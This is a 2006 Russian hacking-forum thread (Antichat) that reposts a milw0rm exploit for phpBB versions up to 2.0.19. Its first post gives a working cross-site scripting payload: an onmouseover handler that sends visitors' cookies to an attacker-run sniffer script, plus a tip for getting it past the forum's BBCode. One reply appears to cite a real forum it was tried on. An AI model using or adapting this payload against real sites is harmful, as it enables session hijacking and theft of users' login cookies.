HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit
  #1  
Старый 30.01.2006, 01:05
Rebz
Флудер
Регистрация: 08.11.2004
Сообщений: 3,395
С нами: 11317286

Репутация: 3876


По умолчанию phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit
/*
As long as html is ON in the latest version of phpBB forums,
several XSS attack vectors are possible. phpBB incorrectly
filters in both messages and profiles, making cookie stealing,
and other XSS attacks possible. the exploit leads to arbitary
javascript execution, which in turn can lead to html defacement.

use of the <pre> tag means that the cursor must pass it in the y
direction only. e.g. the mouse only needs to cross a point
horrizontaly equal to the link in order for the javascript to be executed.

the following is a simple attack:
*/

Код:
<pre a='>' onmouseover='document.location="http://адрес_сниффера/сниффер.php?c="+document.cookie' b='<pre' >

[url_]http://www.somesite.com/[/url_]</pre>
* в теге [url_] убираем знак подчеркивания "_".

# milw0rm.com [2006-01-29]
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 18.02.2006, 17:18
MERTXX
Новичок
Регистрация: 05.02.2006
Сообщений: 5
С нами: 10663012

Репутация: -9
По умолчанию
thankss....http://www.turkhackerler.com/forum ===>> 2.0.19 thank you Rebz..
 
Ответить с цитированием

  #3  
Старый 18.02.2006, 20:46
SanyaX
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
С нами: 11200586

Репутация: 1398


По умолчанию
Прикольно а сам нашёл ии где то взял?
__________________
-=Ok let's Go=-
-=OpenVPN=-
 
Ответить с цитированием

  #4  
Старый 18.02.2006, 21:43
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
С нами: 11517446

Репутация: 2258


По умолчанию
Цитата:
Сообщение от SanyaX  
Прикольно а сам нашёл ии где то взял?
Цитата:
# milw0rm.com [2006-01-29]
Цитата:
Сообщение от Antichat.Ru  
Набранное вами сообщение слишком короткое. Увеличьте ваше сообщение до 5 символов.
мда =)
__________________
Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
 
Ответить с цитированием

  #5  
Старый 28.02.2006, 19:45
Gang100
Banned
Регистрация: 18.02.2006
Сообщений: 37
С нами: 10644806

Репутация: 52
По умолчанию
уязвимость работает только с включеным Html на форуме, а таких форумов единицы =(
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Новая XSS на форуме phpBB 2.0.19 NeMiNeM Уязвимости CMS / форумов 6 26.10.2006 21:30
phpBB <= 2.0.18 Remote Dictionary Attack Tool D1mOn Уязвимости CMS / форумов 5 31.01.2006 19:54
phpBB <= 2.0.18 exploit froZen* Уязвимости CMS / форумов 5 22.12.2005 15:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.